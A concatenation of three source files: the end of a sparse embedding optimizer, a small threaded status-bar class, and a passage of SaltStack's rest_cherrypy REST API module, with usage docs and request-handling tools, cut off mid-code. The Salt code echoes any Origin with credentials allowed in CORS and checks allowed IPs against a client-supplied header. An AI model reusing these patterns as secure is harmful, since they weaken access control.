#clr = self.args.lr / (1 + (self.state_step - 1) * group['lr_decay'])
# the update is non-linear so indices must be unique
grad_indices = idx
grad_values = grad
if self.async_q is not None:
grad_indices.share_memory_()
grad_values.share_memory_()
self.async_q.put((grad_indices, grad_values, gpu_id))
else:
grad_sum = (grad_values * grad_values).mean(1)
device = self.state_sum.device
if device != grad_indices.device:
grad_indices = grad_indices.to(device)
if device != grad_sum.device:
grad_sum = grad_sum.to(device)
if self.has_cross_rel:
cpu_mask = self.cpu_bitmap[grad_indices]
cpu_idx = grad_indices[cpu_mask]
if cpu_idx.shape[0] > 0:
cpu_grad = grad_values[cpu_mask]
cpu_sum = grad_sum[cpu_mask].cpu()
cpu_idx = cpu_idx.cpu()
self.global_emb.state_sum.index_add_(0, cpu_idx, cpu_sum)
std = self.global_emb.state_sum[cpu_idx]
if gpu_id >= 0:
std = std.cuda(gpu_id)
std_values = std.sqrt_().add_(1e-10).unsqueeze(1)
tmp = (-clr * cpu_grad / std_values)
tmp = tmp.cpu()
self.global_emb.emb.index_add_(0, cpu_idx, tmp)
self.state_sum.index_add_(0, grad_indices, grad_sum)
std = self.state_sum[grad_indices] # _sparse_mask
if gpu_id >= 0:
std = std.cuda(gpu_id)
std_values = std.sqrt_().add_(1e-10).unsqueeze(1)
tmp = (-clr * grad_values / std_values)
if tmp.device != device:
tmp = tmp.to(device)
# TODO(zhengda) the overhead is here.
self.emb.index_add_(0, grad_indices, tmp)
self.trace = []
def create_async_update(self):
"""Set up the async update subprocess.
"""
self.async_q = Queue(1)
self.async_p = mp.Process(target=async_update, args=(self.args, self, self.async_q))
self.async_p.start()
def finish_async_update(self):
"""Notify the async update subprocess to quit.
"""
self.async_q.put((None, None, None))
self.async_p.join()
def curr_emb(self):
"""Return embeddings in trace.
"""
data = [data for _, data in self.trace]
return th.cat(data, 0)
def save(self, path, name):
"""Save embeddings.
Parameters
----------
path : str
Directory to save the embedding.
name : str
Embedding name.
"""
file_name = os.path.join(path, name+'.npy')
np.save(file_name, self.emb.cpu().detach().numpy())
def load(self, path, name):
"""Load embeddings.
Parameters
----------
path : str
Directory to load the embedding.
name : str
Embedding name.
"""
file_name = os.path.join(path, name+'.npy')
self.emb = th.Tensor(np.load(file_name))
|
updatable_bar.py | from bento import bars
import threading
import time
class UpdatableBar(bars.BasicBar):
def __init__(self, *args, update_interval: float=1, **kwargs):
super().__init__(*args, **kwargs)
self.update_thread = None
self.update_interval = update_interval
self.running = threading.Event()
self.running.set()
self.kill = threading.Event()
self.kill.clear()
def create(self):
super().create(0.001)
def do_update(self):
raise NotImplementedError("Please subclass this and implement it!")
def mainloop(self):
while not self.kill.is_set():
while not self.is_running():
self.running.wait(timeout=1)
if self.kill.is_set():
return
self.do_update()
time.sleep(self.update_interval)
def is_running(self):
return self.running.is_set()
def start_update(self):
self.running.set()
if self.update_thread is None or not self.update_thread.is_alive():
self.update_thread = threading.Thread(
target=self.mainloop, args=())
self.update_thread.start()
def pause_update(self, delay=1):
self.running.clear()
def stop_update(self):
self.kill.set()
self.wait_for_exit()
def wait_for_exit(self):
self.update_thread.join()
|
app.py | """
A REST API for Salt
===================
.. py:currentmodule:: salt.netapi.rest_cherrypy.app
.. note::
This module is Experimental on Windows platforms and supports limited
configurations:
- doesn't support PAM authentication (i.e. external_auth: auto)
- doesn't support SSL (i.e. disable_ssl: True)
:depends:
- CherryPy Python module.
Note: there is a `known SSL traceback for CherryPy versions 3.2.5 through
3.7.x <https://github.com/cherrypy/cherrypy/issues/1298>`_. Please use
version 3.2.3 or the latest 10.x version instead.
:optdepends: - ws4py Python module for websockets support.
:client_libraries:
- Java: https://github.com/SUSE/salt-netapi-client
- Python: https://github.com/saltstack/pepper
:setup:
All steps below are performed on the machine running the Salt Master
daemon. Configuration goes into the Master configuration file.
1. Install ``salt-api``. (This step varies between OS and Linux distros.
Some package systems have a split package, others include salt-api in
the main Salt package. Ensure the ``salt-api --version`` output matches
the ``salt --version`` output.)
2. Install CherryPy. (Read the version caveat in the section above.)
3. Optional: generate self-signed SSL certificates.
Using a secure HTTPS connection is strongly recommended since Salt
eauth authentication credentials will be sent over the wire.
1. Install the PyOpenSSL package.
2. Generate a self-signed certificate using the
:py:func:`~salt.modules.tls.create_self_signed_cert` execution
function.
.. code-block:: bash
salt-call --local tls.create_self_signed_cert
4. Edit the master config to create at least one external auth user or
group following the :ref:`full external auth instructions <acl-eauth>`.
5. Edit the master config with the following production-ready example to
enable the ``rest_cherrypy`` module. (Adjust cert paths as needed, or
disable SSL (not recommended!).)
.. code-block:: yaml
rest_cherrypy:
port: 8000
ssl_crt: /etc/pki/tls/certs/localhost.crt
ssl_key: /etc/pki/tls/certs/localhost.key
6. Restart the ``salt-master`` daemon.
7. Start the ``salt-api`` daemon.
:configuration:
All available configuration options are detailed below. These settings
configure the CherryPy HTTP server and do not apply when using an external
server such as Apache or Nginx.
port
**Required**
The port for the webserver to listen on.
host : ``0.0.0.0``
The socket interface for the HTTP server to listen on.
debug : ``False``
Starts the web server in development mode. It will reload itself when
the underlying code is changed and will output more debugging info.
log_access_file
Path to a file to write HTTP access logs.
.. versionadded:: 2016.11.0
log_error_file
Path to a file to write HTTP error logs.
.. versionadded:: 2016.11.0
ssl_crt
The path to a SSL certificate. (See below)
ssl_key
The path to the private key for your SSL certificate. (See below)
ssl_chain
(Optional when using PyOpenSSL) the certificate chain to pass to
``Context.load_verify_locations``.
disable_ssl
A flag to disable SSL. Warning: your Salt authentication credentials
will be sent in the clear!
webhook_disable_auth : False
The :py:class:`Webhook` URL requires authentication by default but
external services cannot always be configured to send authentication.
See the Webhook documentation for suggestions on securing this
interface.
webhook_url : /hook
Configure the URL endpoint for the :py:class:`Webhook` entry point.
thread_pool : ``100``
The number of worker threads to start up in the pool.
socket_queue_size : ``30``
Specify the maximum number of HTTP connections to queue.
expire_responses : True
Whether to check for and kill HTTP responses that have exceeded the
default timeout.
.. deprecated:: 2016.11.9,2017.7.3,2018.3.0
The "expire_responses" configuration setting, which corresponds
to the ``timeout_monitor`` setting in CherryPy, is no longer
supported in CherryPy versions >= 12.0.0.
max_request_body_size : ``1048576``
Maximum size for the HTTP request body.
collect_stats : False
Collect and report statistics about the CherryPy server
Reports are available via the :py:class:`Stats` URL.
stats_disable_auth : False
Do not require authentication to access the ``/stats`` endpoint.
.. versionadded:: 2018.3.0
static
A filesystem path to static HTML/JavaScript/CSS/image assets.
static_path : ``/static``
The URL prefix to use when serving static assets out of the directory
specified in the ``static`` setting.
enable_sessions : ``True``
Enable or disable all endpoints that rely on session cookies. This can
be useful to enforce only header-based authentication.
.. versionadded:: 2017.7.0
app : ``index.html``
A filesystem path to an HTML file that will be served as a static file.
This is useful for bootstrapping a single-page JavaScript app.
Warning! If you set this option to a custom web application, anything
that uses cookie-based authentication is vulnerable to XSRF attacks.
Send the custom ``X-Auth-Token`` header instead and consider disabling
the ``enable_sessions`` setting.
.. versionchanged:: 2017.7.0
Add a proof-of-concept JavaScript single-page app.
app_path : ``/app``
The URL prefix to use for serving the HTML file specified in the ``app``
setting. This should be a simple name containing no slashes.
Any path information after the specified path is ignored; this is
useful for apps that utilize the HTML5 history API.
root_prefix : ``/``
A URL path to the main entry point for the application. This is useful
for serving multiple applications from the same URL.
.. _rest_cherrypy-auth:
Authentication
--------------
Authentication is performed by passing a session token with each request.
Tokens are generated via the :py:class:`Login` URL.
The token may be sent in one of two ways: as a custom header or as a session
cookie. The latter is far more convenient for clients that support cookies.
* Include a custom header named :mailheader:`X-Auth-Token`.
For example, using curl:
.. code-block:: bash
curl -sSk https://localhost:8000/login \\
-H 'Accept: application/x-yaml' \\
-d username=saltdev \\
-d password=saltdev \\
-d eauth=pam
Copy the ``token`` value from the output and include it in subsequent requests:
.. code-block:: bash
curl -sSk https://localhost:8000 \\
-H 'Accept: application/x-yaml' \\
-H 'X-Auth-Token: 697adbdc8fe971d09ae4c2a3add7248859c87079'\\
-d client=local \\
-d tgt='*' \\
-d fun=test.ping
* Sent via a cookie. This option is a convenience for HTTP clients that
automatically handle cookie support (such as browsers).
For example, using curl:
.. code-block:: bash
# Write the cookie file:
curl -sSk https://localhost:8000/login \\
-c ~/cookies.txt \\
-H 'Accept: application/x-yaml' \\
-d username=saltdev \\
-d password=saltdev \\
-d eauth=auto
# Read the cookie file:
curl -sSk https://localhost:8000 \\
-b ~/cookies.txt \\
-H 'Accept: application/x-yaml' \\
-d client=local \\
-d tgt='*' \\
-d fun=test.ping
Another example using the :program:`requests` library in Python:
.. code-block:: python
>>> import requests
>>> session = requests.Session()
>>> session.post('http://localhost:8000/login', json={
'username': 'saltdev',
'password': 'saltdev',
'eauth': 'auto',
})
<Response [200]>
>>> resp = session.post('http://localhost:8000', json=[{
'client': 'local',
'tgt': '*',
'fun': 'test.arg',
'arg': ['foo', 'bar'],
'kwarg': {'baz': 'Baz!'},
}])
>>> resp.json()
{u'return': [{
...snip...
}]}
.. seealso:: You can bypass the session handling via the :py:class:`Run` URL.
Usage
-----
This interface directly exposes Salt's :ref:`Python API <python-api>`.
Everything possible at the CLI is possible through the Python API. Commands are
executed on the Salt Master.
The root URL (``/``) is RPC-like in that it accepts instructions in the request
body for what Salt functions to execute, and the response contains the result
of those function calls.
For example:
.. code-block:: text
% curl -sSi https://localhost:8000 \
-H 'Content-type: application/json' \
-d '[{
"client": "local",
"tgt": "*",
"fun": "test.ping"
}]'
HTTP/1.1 200 OK
Content-Type: application/json
[...snip...]
{"return": [{"jerry": true}]}
The request body must be an array of commands. Use this workflow to build a
command:
1. Choose a client interface.
2. Choose a function.
3. Fill out the remaining parameters needed for the chosen client.
The ``client`` field is a reference to the main Python classes used in Salt's
Python API. Read the full :ref:`Client APIs <client-apis>` documentation, but
in short:
* "local" uses :py:class:`LocalClient <salt.client.LocalClient>` which sends
commands to Minions. Equivalent to the ``salt`` CLI command.
* "runner" uses :py:class:`RunnerClient <salt.runner.RunnerClient>` which
invokes runner modules on the Master. Equivalent to the ``salt-run`` CLI
command.
* "wheel" uses :py:class:`WheelClient <salt.wheel.WheelClient>` which invokes
wheel modules on the Master. Wheel modules do not have a direct CLI
equivalent but they typically manage Master-side resources such as state
files, pillar files, the Salt config files, and the :py:mod:`key wheel module
<salt.wheel.key>` exposes similar functionality as the ``salt-key`` CLI
command.
Most clients have variants like synchronous or asynchronous execution as well as
others like batch execution. See the :ref:`full list of client interfaces
<client-interfaces>`.
Each client requires different arguments and sometimes has different syntax.
For example, ``LocalClient`` requires the ``tgt`` argument because it forwards
the command to Minions and the other client interfaces do not. ``LocalClient``
also takes ``arg`` (array) and ``kwarg`` (dictionary) arguments because these
values are sent to the Minions and used to execute the requested function
there. ``RunnerClient`` and ``WheelClient`` are executed directly on the Master
and thus do not need or accept those arguments.
Read the method signatures in the client documentation linked above, but
hopefully an example will help illustrate the concept. This example causes Salt
to execute two functions -- the :py:func:`test.arg execution function
<salt.modules.test.arg>` using ``LocalClient`` and the :py:func:`test.arg
runner function <salt.runners.test.arg>` using ``RunnerClient``; note the
different structure for each command. The results for both are combined and
returned as one response.
.. code-block:: text
% curl -b ~/cookies.txt -sSi localhost:8000 \
-H 'Content-type: application/json' \
-d '
[
{
"client": "local",
"tgt": "*",
"fun": "test.arg",
"arg": ["positional arg one", "positional arg two"],
"kwarg": {
"keyword arg one": "Hello from a minion",
"keyword arg two": "Hello again from a minion"
}
},
{
"client": "runner",
"fun": "test.arg",
"keyword arg one": "Hello from a master",
"keyword arg two": "Runners do not support positional args"
}
]
'
HTTP/1.1 200 OK
[...snip...]
{
"return": [
{
"jerry": {
"args": [
"positional arg one",
"positional arg two"
],
"kwargs": {
"keyword arg one": "Hello from a minion",
"keyword arg two": "Hello again from a minion",
[...snip...]
}
},
[...snip; other minion returns here...]
},
{
"args": [],
"kwargs": {
"keyword arg two": "Runners do not support positional args",
"keyword arg one": "Hello from a master"
}
}
]
}
One more example, this time with more commonly used functions:
.. code-block:: text
curl -b /tmp/cookies.txt -sSi localhost:8000 \
-H 'Content-type: application/json' \
-d '
[
{
"client": "local",
"tgt": "*",
"fun": "state.sls",
"kwarg": {
"mods": "apache",
"pillar": {
"lookup": {
"wwwdir": "/srv/httpd/htdocs"
}
}
}
},
{
"client": "runner",
"fun": "cloud.create",
"provider": "my-ec2-provider",
"instances": "my-centos-6",
"image": "ami-1624987f",
"delvol_on_destroy", true
}
]
'
HTTP/1.1 200 OK
[...snip...]
{
"return": [
{
"jerry": {
"pkg_|-install_apache_|-httpd_|-installed": {
[...snip full state return here...]
}
}
[...snip other minion returns here...]
},
{
[...snip full salt-cloud output here...]
}
]
}
Content negotiation
-------------------
This REST interface is flexible in what data formats it will accept as well
as what formats it will return (e.g., JSON, YAML, urlencoded).
* Specify the format of data in the request body by including the
:mailheader:`Content-Type` header.
* Specify the desired data format for the response body with the
:mailheader:`Accept` header.
We recommend the JSON format for most HTTP requests. urlencoded data is simple
and cannot express complex data structures -- and that is often required for
some Salt commands, such as starting a state run that uses Pillar data. Salt's
CLI tool can reformat strings passed in at the CLI into complex data
structures, and that behavior also works via salt-api, but that can be brittle
and since salt-api can accept JSON it is best just to send JSON.
Here is an example of sending urlencoded data:
.. code-block:: bash
curl -sSik https://localhost:8000 \\
-b ~/cookies.txt \\
-d client=runner \\
-d fun='jobs.lookup_jid' \\
-d jid='20150129182456704682'
.. admonition:: urlencoded data caveats
* Only a single command may be sent per HTTP request.
* Repeating the ``arg`` parameter multiple times will cause those
parameters to be combined into a single list.
Note, some popular frameworks and languages (notably jQuery, PHP, and
Ruby on Rails) will automatically append empty brackets onto repeated
query string parameters. E.g., ``?foo[]=fooone&foo[]=footwo``. This is
**not** supported; send ``?foo=fooone&foo=footwo`` instead, or send JSON
or YAML.
A note about ``curl``
The ``-d`` flag to curl does *not* automatically urlencode data which can
affect passwords and other data that contains characters that must be
encoded. Use the ``--data-urlencode`` flag instead. E.g.:
.. code-block:: bash
curl -ksi http://localhost:8000/login \\
-H "Accept: application/json" \\
-d username='myapiuser' \\
--data-urlencode password='1234+' \\
-d eauth='pam'
Performance Expectations and Recommended Usage
==============================================
This module provides a thin wrapper around :ref:`Salt's Python API
<python-api>`. Executing a Salt command via rest_cherrypy is directly analogous
to executing a Salt command via Salt's CLI (which also uses the Python API) --
they share the same semantics, performance characteristics, and 98% of the same
code. As a rule-of-thumb: if you wouldn't do it at the CLI don't do it via this
API.
Long-Running HTTP Connections
-----------------------------
The CherryPy server is a production-ready, threading HTTP server written in
Python. Because it makes use of a thread pool to process HTTP requests it is
not ideally suited to maintaining large numbers of concurrent, synchronous
connections. On moderate hardware with default settings it should top-out at
around 30 to 50 concurrent connections.
That number of long-running, synchronous Salt processes is also not ideal. Like
at the CLI, each Salt command run will start a process that instantiates its
own ``LocalClient``, which instantiates its own listener to the Salt event bus,
and sends out its own periodic ``saltutil.find_job`` queries to determine if a
Minion is still running the command. Not exactly a lightweight operation.
Timeouts
--------
In addition to the above resource overhead for long-running connections, there
are the usual HTTP timeout semantics for the CherryPy server, any HTTP client
being used, as well as any hardware in between such as proxies, gateways, or
load balancers. rest_cherrypy can be configured not to time-out long responses
via the ``expire_responses`` setting, and both :py:class:`LocalClient
<salt.client.LocalClient>` and :py:class:`RunnerClient
<salt.runner.RunnerClient>` have their own timeout parameters that may be
passed as top-level keywords:
.. code-block:: bash
curl -b /tmp/cookies.txt -sSi localhost:8000 \
-H 'Content-type: application/json' \
-d '
[
{
"client": "local",
"tgt": "*",
"fun": "test.sleep",
"kwarg": {"length": 30},
"timeout": 60
},
{
"client": "runner",
"fun": "test.sleep",
"kwarg": {"s_time": 30},
"timeout": 60
}
]
'
Best Practices
--------------
Given the performance overhead and HTTP timeouts for long-running operations
described above, the most effective and most scalable way to use both Salt and
salt-api is to run commands asynchronously using the ``local_async``,
``runner_async``, and ``wheel_async`` clients.
Running asynchronous jobs results in being able to process 3x more commands per second
for ``LocalClient`` and 17x more commands per second for ``RunnerClient``, in
addition to much less network traffic and memory requirements. Job returns can
be fetched from Salt's job cache via the ``/jobs/<jid>`` endpoint, or they can
be collected into a data store using Salt's :ref:`Returner system <returners>`.
The ``/events`` endpoint is specifically designed to handle long-running HTTP
connections and it exposes Salt's event bus which includes job returns.
Watching this endpoint first, then executing asynchronous Salt commands second,
is the most lightweight and scalable way to use ``rest_cherrypy`` while still
receiving job returns in real-time. But this requires clients that can properly
handle the inherent asynchronicity of that workflow.
Performance Tuning
------------------
The ``thread_pool`` and ``socket_queue_size`` settings can be used to increase
the capacity of rest_cherrypy to handle incoming requests. Keep an eye on RAM
usage as well as available file handles while testing changes to these
settings. As salt-api is a thin wrapper around Salt's Python API, also keep an
eye on the performance of Salt when testing.
Future Plans
------------
Now that Salt uses the Tornado concurrency library internally, we plan to
improve performance in the API by taking advantage of existing processes and
event listeners and to use lightweight coroutines to facilitate more
simultaneous HTTP connections and better support for synchronous operations.
That effort can be tracked in `issue 26505`__, but until that issue is closed
rest_cherrypy will remain the officially recommended REST API.
.. __: https://github.com/saltstack/salt/issues/26505
.. |req_token| replace:: a session token from :py:class:`~Login`.
.. |req_accept| replace:: the desired response format.
.. |req_ct| replace:: the format of the request body.
.. |res_ct| replace:: the format of the response body; depends on the
:mailheader:`Accept` request header.
.. |200| replace:: success
.. |400| replace:: bad or malformed request
.. |401| replace:: authentication required
.. |406| replace:: requested Content-Type not available
"""
import functools
import io
import itertools
import logging
import os
import signal
import tarfile
from collections.abc import Iterator, Mapping
from multiprocessing import Pipe, Process
from urllib.parse import parse_qsl
import cherrypy # pylint: disable=import-error,3rd-party-module-not-gated
import salt
import salt.auth
import salt.exceptions
import salt.netapi
import salt.utils.event
import salt.utils.json
import salt.utils.stringutils
import salt.utils.versions
import salt.utils.yaml
logger = logging.getLogger(__name__)
try:
from cherrypy.lib import ( # pylint: disable=import-error,3rd-party-module-not-gated
cpstats,
)
except AttributeError:
cpstats = None
logger.warn(
"Import of cherrypy.cpstats failed. Possible upstream bug: "
"https://github.com/cherrypy/cherrypy/issues/1444"
)
except ImportError:
cpstats = None
logger.warn("Import of cherrypy.cpstats failed.")
try:
# Imports related to websocket
from .tools import websockets
from . import event_processor
HAS_WEBSOCKETS = True
except ImportError:
websockets = type("websockets", (object,), {"SynchronizingWebsocket": None})
HAS_WEBSOCKETS = False
def html_override_tool():
"""
Bypass the normal handler and serve HTML for all URLs
The ``app_path`` setting must be non-empty and the request must ask for
``text/html`` in the ``Accept`` header.
"""
apiopts = cherrypy.config["apiopts"]
request = cherrypy.request
url_blacklist = (
apiopts.get("app_path", "/app"),
apiopts.get("static_path", "/static"),
)
if "app" not in cherrypy.config["apiopts"]:
return
if request.path_info.startswith(url_blacklist):
return
if request.headers.get("Accept") == "*/*":
return
try:
wants_html = cherrypy.lib.cptools.accept("text/html")
except cherrypy.HTTPError:
return
else:
if wants_html != "text/html":
return
raise cherrypy.InternalRedirect(apiopts.get("app_path", "/app"))
def salt_token_tool():
"""
If the custom authentication header is supplied, put it in the cookie dict
so the rest of the session-based auth works as intended
"""
x_auth = cherrypy.request.headers.get("X-Auth-Token", None)
# X-Auth-Token header trumps session cookie
if x_auth:
cherrypy.request.cookie["session_id"] = x_auth
def salt_api_acl_tool(username, request):
"""
.. versionadded:: 2016.3.0
Verifies user requests against the API whitelist. (User/IP pair)
in order to provide whitelisting for the API similar to the
master, but over the API.
.. code-block:: yaml
rest_cherrypy:
api_acl:
users:
'*':
- 1.1.1.1
- 1.1.1.2
foo:
- 8.8.4.4
bar:
- '*'
:param username: Username to check against the API.
:type username: str
:param request: Cherrypy request to check against the API.
:type request: cherrypy.request
"""
failure_str = "[api_acl] Authentication failed for " "user %s from IP %s"
success_str = "[api_acl] Authentication successful for user %s from IP %s"
pass_str = "[api_acl] Authentication not checked for " "user %s from IP %s"
acl = None
# Salt Configuration
salt_config = cherrypy.config.get("saltopts", None)
if salt_config:
# Cherrypy Config.
cherrypy_conf = salt_config.get("rest_cherrypy", None)
if cherrypy_conf:
# ACL Config.
acl = cherrypy_conf.get("api_acl", None)
ip = request.remote.ip
if acl:
users = acl.get("users", {})
if users:
if username in users:
if ip in users[username] or "*" in users[username]:
logger.info(success_str, username, ip)
return True
else:
logger.info(failure_str, username, ip)
return False
elif username not in users and "*" in users:
if ip in users["*"] or "*" in users["*"]:
logger.info(success_str, username, ip)
return True
else:
logger.info(failure_str, username, ip)
return False
else:
logger.info(failure_str, username, ip)
return False
else:
logger.info(pass_str, username, ip)
return True
def salt_ip_verify_tool():
"""
If there is a list of restricted IPs, verify current
client is coming from one of those IPs.
"""
# This is overly cumbersome and crude,
# But, it's also safe... ish...
salt_config = cherrypy.config.get("saltopts", None)
if salt_config:
cherrypy_conf = salt_config.get("rest_cherrypy", None)
if cherrypy_conf:
auth_ip_list = cherrypy_conf.get("authorized_ips", None)
if auth_ip_list:
logger.debug("Found IP list: %s", auth_ip_list)
rem_ip = cherrypy.request.headers.get("Remote-Addr", None)
logger.debug("Request from IP: %s", rem_ip)
if rem_ip not in auth_ip_list:
logger.error("Blocked IP: %s", rem_ip)
raise cherrypy.HTTPError(403, "Bad IP")
def salt_auth_tool():
"""
Redirect all unauthenticated requests to the login page
"""
# Redirect to the login page if the session hasn't been authed
if "token" not in cherrypy.session: # pylint: disable=W8601
raise cherrypy.HTTPError(401)
# Session is authenticated; inform caches
cherrypy.response.headers["Cache-Control"] = "private"
def cors_tool():
"""
Handle both simple and complex CORS requests
Add CORS headers to each response. If the request is a CORS preflight
request swap out the default handler with a simple, single-purpose handler
that verifies the request and provides a valid CORS response.
"""
req_head = cherrypy.request.headers
resp_head = cherrypy.response.headers
# Always set response headers necessary for 'simple' CORS.
resp_head["Access-Control-Allow-Origin"] = req_head.get("Origin", "*")
resp_head["Access-Control-Expose-Headers"] = "GET, POST"
resp_head["Access-Control-Allow-Credentials"] = "true"
# Non-simple CORS preflight request; short-circuit the normal handler.
if cherrypy.request.method == "OPTIONS":
ac_method = req_head.get("Access-Control-Request-Method", None)
allowed_methods = ["GET", "POST"]
allowed_headers = [
"Content-Type",
"X-Auth-Token",
"X-Requested-With",
]
if ac_method and ac_method in allowed_methods:
resp_head["Access-Control-Allow-Methods"] = ", ".join(allowed_methods)
resp_head["Access-Control-Allow-Headers"] = ", ".join(allowed_headers)
resp_head["Connection"] = "keep-alive"
resp_head["Access-Control-Max-Age"] = "1400"
# Note: CherryPy on Py3 uses binary objects for the response
# Python 2.6 also supports the byte prefix, so no need for conditionals
cherrypy.response.body = b""
cherrypy.response.status = 200
# CORS requests should short-circuit the other tools.
cherrypy.serving.request.handler = None
# Needed to avoid the auth_tool check.
if cherrypy.request.config.get("tools.sessions.on", False):
cherrypy.session["token"] = True
return True
# Be conservative in what you send
# Maps Content-Type to serialization functions; this is a tuple of tuples to
# preserve order of preference.
ct_out_map = (
("application/json", salt.utils.json.dumps),
(
"application/x-yaml",
functools.partial(salt.utils.yaml.safe_dump, default_flow_style=False),
),
)
def hypermedia_handler(*args, **kwargs):
"""
Determine the best output format based on the Accept header, execute the
regular handler, and transform the output to the request content type (even
if it's an error).
:param args: Pass args through to the main handler
:param kwargs: Pass kwargs through to the main handler
"""
# Execute the real handler. Handle or pass-through any errors we know how
# to handle (auth & HTTP errors). Reformat any errors we don't know how to
# handle as a data structure.
try:
cherrypy.response.processors = dict(ct_out_map)
ret = cherrypy.serving.request._hypermedia_inner_handler(*args, **kwargs)
except (
salt.exceptions.AuthenticationError,
salt.exceptions.AuthorizationError,
salt.exceptions.EauthAuthenticationError,
salt.exceptions.TokenAuthenticationError,
):
raise cherrypy.HTTPError(401)
except salt.exceptions.SaltInvocationError:
raise cherrypy.HTTPError(400)
except (
salt.exceptions.SaltDaemonNotRunning,
salt.exceptions.SaltReqTimeoutError,
) as exc:
raise cherrypy.HTTPError(503, exc.strerror)
except salt.exceptions.SaltClientTimeout:
raise cherrypy.HTTPError(504)
except cherrypy.CherryPyException:
raise
except Exception as exc: # pylint: disable=broad-except
# The TimeoutError exception class was removed in CherryPy in 12.0.0, but
# Still check existence of TimeoutError and handle in CherryPy < 12.
# The check was moved down from the SaltClientTimeout error line because
# A one-line if statement throws a BaseException inheritance TypeError.
if hasattr(cherrypy, "TimeoutError") and isinstance(exc, cherrypy.TimeoutError):
raise cherrypy.HTTPError(504)
import traceback
logger.debug(
"Error while processing request for: %s",
cherrypy.request.path_info,
exc_info=True,
)
cherrypy.response.status = 500
ret = {
"status": cherrypy.response.status,
"return": "{}".format(traceback.format_exc())
if cherrypy.config["debug"]
else "An unexpected error occurred",
}
# Raises 406 if requested content-type is not supported
best = cherrypy.lib.cptools.accept([i for (i, _) in ct_out_map])
# Transform the output from the handler into the requested output format
cherrypy.response.headers["Content-Type"] = best
out = cherrypy.response.processors[best]
try:
response = out(ret)
return salt.utils.stringutils.to_bytes(response)
except Exception: # pylint: disable=broad-except
msg = "Could not serialize the return data from Salt."
logger.debug(msg, exc_info=True)
raise cherrypy.HTTPError(500, msg)
def hypermedia_out():
"""
Determine the best handler for the requested content type
Wrap the normal handler and transform the output from that handler into the
requested content type
"""
request = cherrypy.serving.request
request._hypermedia_inner_handler = request.handler
# If handler has been explicitly set to None, don't override.
if request.handler is not None:
request.handler = hypermedia_handler
def process_request_body(fn):
"""
A decorator to skip a processor function if process_request_body is False
"""
@functools.wraps(fn)
def wrapped(*args, **kwargs): # pylint: disable=C0111
if cherrypy.request.process_request_body is not False:
fn(*args, **kwargs)
return wrapped
def urlencoded_processor(entity):
"""
Accept x-www-form-urlencoded data and reformat it into a Low State
data structure.
Since we can't easily represent complicated data structures with
key-value pairs, any more complicated requirements (e.g. compound
commands) must instead be delivered via JSON or YAML.
For example::
.. code-block:: bash
curl -si localhost:8000 -d client=local -d tgt='*' \\
-d fun='test.kwarg' -d arg='one=1' -d arg='two=2'
:param entity: raw POST data
"""
# cherrypy._cpreqbody.process_urlencoded doesn't preserve the raw
# "body", so we have to handle parsing the tokens using parse_qsl
urlencoded = entity.read()
try:
urlencoded = urlencoded.decode("utf-8")
except (UnicodeDecodeError, AttributeError):
pass
cherrypy.serving.request.raw_body = urlencoded
unserialized_data = {}
for key, val in parse_qsl(urlencoded):
unserialized_data.setdefault(key, []).append(val)
for key, val in unserialized_data.items():
if len(val) == 1:
unserialized_data[key] = val[0]
if len(val) == 0:
unserialized_data[key] = ""
cherrypy.serving.request.unserialized_data = unserialized_data
@process_request_body
def json_processor(entity):
"""
Unserialize raw POST data in JSON format to a Python data structure.
:param entity: raw POST data
"""
# https://github.com/cherrypy/cherrypy/pull/1572
contents = io.BytesIO()
body = entity.fp.read(fp_out=contents)
contents.seek(0)
body = salt.utils.stringutils.to_unicode(contents.read())
del contents
try:
cherrypy.serving.request.unserialized_data = salt.utils.json.loads(body)
except ValueError:
raise cherrypy.HTTPError(400, "Invalid JSON document")
cherrypy.serving.request.raw_body = body
@process_request_body
def yaml_processor(entity):
"""
Unserialize raw POST data in YAML format to a Python data structure.
:param entity: raw POST data
"""
# https://github.com/cherrypy/cherrypy/pull/1572
contents = io.BytesIO()
body = entity.fp.read(fp_out=contents)
contents.seek(0)
body = salt.utils.stringutils.to_unicode(contents.read())
try:
cherrypy.serving.request.unserialized_data = salt.utils.yaml.safe_load(body)
except ValueError:
raise cherrypy.HTTPError(400, "Invalid YAML document")
cherrypy.serving.request.raw_body = body
@process_request_body
def text_processor(entity):
"""
Attempt to unserialize plain text as JSON
Some large services still send JSON with a text/plain Content-Type. Those
services are bad and should feel bad.
:param entity: raw POST data
"""
# https://github.com/cherrypy/cherrypy/pull/1572
contents = io.BytesIO()
body = entity.fp.read(fp_out=contents)
contents.seek(0)
body = salt.utils.stringutils.to_unicode(contents.read())
try:
cherrypy.serving.request.unserialized_data = salt.utils.json.loads(body)
except ValueError:
cherrypy.serving.request.unserialized_data = body
cherrypy.serving.request.raw_body = body
def hypermedia_in():
"""
Unserialize POST/PUT data of a specified Content-Type.
The following custom processors all are intended to format Low State data
and will place that data structure into the request object.
:raises HTTPError: if the request contains a Content-Type that we do not
have a processor for
"""
# Be liberal in what you accept
ct_in_map = {
"application/x-www-form-urlencoded": urlencoded_processor,
"application/json": json_processor,
"application/x-yaml": yaml_processor,
"text/yaml": yaml_processor,
"text/plain": text_processor,
}
# Do not process the body for POST requests that have specified no content
# or have not specified Content-Length
if (
cherrypy.request.method.upper() == "POST"
and cherrypy.request.headers.get("Content-Length", "0") == "0"
):
cherrypy.request.process_request_body = False
cherrypy.request.unserialized_data = None
cherrypy.request.body.processors.clear()
cherrypy.request.body.default_proc = cherrypy.HTTPError(
406, "Content type not supported"
)
cherrypy.request.body.processors = ct_in_map
def lowdata_fmt():
"""
Validate and format lowdata from incoming unserialized request data
This tool requires that the hypermedia_in tool has already been run.
"""
if cherrypy.request.method.upper() != "POST":
return
data = cherrypy.request.unserialized_data
# if the data was sent as urlencoded, we need to make it a list.
# this is a very forgiving implementation as different clients set different
# headers for form encoded data (including charset or something similar)
if data and isinstance(data, Mapping):
# Make the 'arg' param a list if not already
if "arg" in data and not isinstance(
data["arg"], list
): # pylint: disable=unsupported-membership-test
data["arg"] = [data["arg"]]
# Finally, make a Low State and put it in request
cherrypy.request.lowstate = [data]
else:
cherrypy.serving.request.lowstate = data
tools_config = {
"on_start_resource": [
("html_override", html_override_tool),
("salt_token", salt_token_tool),
],
"before_request_body": [
("cors_tool", cors_tool),
("salt_auth", salt_auth_tool),
("hypermedia_in", hypermedia_in),
],
"before_handler": [
("lowdata_fmt", lowdata_fmt),
("hypermedia_out", hypermedia_out),
("salt_ip_verify", salt_ip_verify_tool),
],
}
for hook, tool_list in tools_config.items():
for idx, tool_config in enumerate(tool_list):
tool_name, tool_fn = tool_config
setattr(
